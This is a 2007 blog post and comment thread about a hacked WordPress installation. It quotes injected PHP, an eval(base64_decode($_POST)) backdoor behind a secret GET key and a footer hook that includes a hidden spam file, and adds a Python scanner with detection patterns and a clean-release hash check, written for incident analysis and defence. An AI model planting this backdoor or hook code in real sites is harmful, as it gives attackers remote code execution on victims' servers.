IBMer working on Lotus Connections by day (and night!) and with interests in agile development, Macs, dogs and gadgets!

Blog error

Posted: November 30th, 2007 | Author: Adrian Spender | Filed under: Uncategorized | 4 Comments »

This blog appeared to be down for some time today. Somehow the default_filters.php file in WordPress had become corrupted. Replacing it with the default file from a WordPress 2.3.1 download solved the problem. A Google search hasn’t turned up anything that sheds any light on the problem. The corrupted file had a timestamp of today and contained some additional content over and above the default file, such as:

This was declared at the top of the file:

if($_GET['0cc9b18defb8385c']=="1a84882ba2eb254c"){ eval(base64_decode($_POST['file'])); exit; }

Then there was this add_action function:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
shuffle($wparr);
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "!/div!".$_footer;
}
}

And this at the bottom:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "!/div!".$_footer;
}
}

(N.B. !div! is an HTML DIV tag but this causes problems if I embed it in the post)

Which is obviously trying to declare the same function ‘wpc7c16b8466d864eeefd20050625c7775′ twice (which the error message identified). I have no idea what was inserting this code, so I’ve left it all out for the time being. I suspect it may be a badly behaving plugin, so apologies if some aspect of the blog doesn’t work correctly. If anybody has any ideas I’d love to hear them.
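As an added illustration (not part of the original post, and not WordPress code), the script below turns the two things described above into defender-side checks: a pattern scan for the constructs found in the tampered default_filters.php (a request-keyed eval of Base64 data, a silenced @include, a wp_footer hook whose callback is "wp" plus a hex string, and the duplicate function declaration that produced the fatal error), and a hash comparison of a live wp-includes tree against an unpacked clean release, which is what replacing the file from the 2.3.1 download did by hand and which also surfaces files like class-mail.php that exist only in the live tree. The sample PHP is constructed from the snippets quoted above (with the DIV tags restored); the directory layout, file names other than those quoted, and the benign_filter_stub function are assumptions for the demo.

```python
from __future__ import annotations

import hashlib
import re
import tempfile
from pathlib import Path

# Patterns derived from the constructs found in the corrupted default_filters.php.
SUSPICIOUS_PATTERNS = {
    # eval(base64_decode($_POST[...])) -- remote code execution from request data
    "eval_base64_post": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST)", re.I),
    # $_GET['<long hex>'] -- a secret trigger key rather than a normal query parameter
    "hex_get_trigger": re.compile(r"\$_GET\[\s*['\"][0-9a-f]{12,}['\"]\s*\]"),
    # add_action('wp_footer','wp<32 hex chars>') -- hook name generated to look WordPress-like
    "hex_named_hook": re.compile(r"add_action\s*\(\s*['\"]wp_footer['\"]\s*,\s*['\"]wp[0-9a-f]{32}['\"]"),
    # @include('...') -- error-suppressed include of an arbitrary file
    "silenced_include": re.compile(r"@include\s*\(\s*['\"][^'\"]+['\"]\s*\)"),
}

FUNC_DECL = re.compile(r"^\s*function\s+([A-Za-z_]\w*)\s*\(", re.M)


def scan_source(src: str) -> list[tuple[str, int]]:
    """Return (finding, line_number) pairs for the contents of one PHP file."""
    findings = []
    for name, pat in SUSPICIOUS_PATTERNS.items():
        for m in pat.finditer(src):
            findings.append((name, src.count("\n", 0, m.start()) + 1))
    # A function declared twice is exactly the fatal error that took the blog down.
    seen: dict[str, int] = {}
    for m in FUNC_DECL.finditer(src):
        fn = m.group(1)
        line = src.count("\n", 0, m.start()) + 1
        if fn in seen:
            findings.append((f"duplicate_function:{fn}", line))
        else:
            seen[fn] = line
    return sorted(findings, key=lambda f: f[1])


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def modified_core_files(live_root: Path, pristine_root: Path) -> dict[str, str]:
    """Compare a live WordPress tree against an unpacked clean release.
    Returns {relative_path: reason} for PHP files that differ from the release
    or that exist only in the live tree (as class-mail.php did)."""
    report = {}
    for live in live_root.rglob("*.php"):
        rel = live.relative_to(live_root)
        clean = pristine_root / rel
        if not clean.exists():
            report[rel.as_posix()] = "not in clean release"
        elif sha256_of(live) != sha256_of(clean):
            report[rel.as_posix()] = "differs from clean release"
    return report


# Constructed sample: the injected lines quoted in the post, with <div> restored,
# around one assumed benign function so the duplicate check has a negative case.
SAMPLE_PHP = r"""<?php
if($_GET['0cc9b18defb8385c']=="1a84882ba2eb254c"){ eval(base64_decode($_POST['file'])); exit; }

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
shuffle($wparr);
echo "<div id=\"goro\">";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "</div>".$_footer;
}
}

function benign_filter_stub() {}

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "<div id=\"goro\">";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "</div>".$_footer;
}
}
"""


def demo() -> tuple[list[tuple[str, int]], dict[str, str]]:
    """Build a constructed live/clean pair in a temp dir and run both checks."""
    findings = scan_source(SAMPLE_PHP)
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean" / "wp-includes"
        live = Path(tmp) / "live" / "wp-includes"
        clean.mkdir(parents=True)
        live.mkdir(parents=True)
        # Stand-ins for the release file and the tampered copy (constructed).
        (clean / "default_filters.php").write_text("<?php\nfunction benign_filter_stub() {}\n")
        (live / "default_filters.php").write_text(SAMPLE_PHP)
        (live / "class-mail.php").write_text("<?php $wparr = array();\n")
        report = modified_core_files(Path(tmp) / "live", Path(tmp) / "clean")
    return findings, report


if __name__ == "__main__":
    found, changed = demo()
    for name, line in found:
        print(f"line {line}: {name}")
    for path, reason in changed.items():
        print(f"{path}: {reason}")
```

The hash comparison is the more reliable of the two checks: pattern matching only catches constructs that look like these, whereas any edit to a core file, including a file that has no business being in wp-includes at all, shows up when compared against a clean release of the same version.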


4 Comments on “Blog error”

  1. Anton Piatek said at 16:23 on December 1st, 2007:

    Looks to me like your blog got hacked and that is the code for a backdoor…
    The first line looks like it allows someone to load a file into your blog via an HTTP POST, which means they can do whatever they want.

    I would change passwords on the blog and start checking for other security problems – That code is not benign!

  2. Adrian Spender said at 17:14 on December 1st, 2007:

    Unfortunately it looks like you are right. class-mail.php isn’t part of WordPress and seems to have been inserted into my wp-includes directory somehow, probably by the method you highlight. How somebody got the backdoor in, in the first place, is unknown. There is nothing to suggest that they gained access to the filesystem on my host (and no, it isn’t world-writable either).

    The contents of class-mail.php contained the assignment of two variables to the contents of a couple of Base64-encoded strings. One contained a load of binary data and some links to an innocuous-looking blog at digitalsweeties.com. The second decoded into a JavaScript function to display an ad from googlesyndication.com.

    Looks like it has happened to others as well, and is probably an exploit of a WordPress vulnerability.

  3. Adrian Spender said at 17:15 on December 1st, 2007:

    Edited to add. This happened well after I recently upgraded to WordPress 2.3.1 as well!

  4. Andy Piper said at 04:31 on December 13th, 2007:

    Eek. Well I assume that WP.com blogs are not vulnerable to whatever backdoor these folks found.
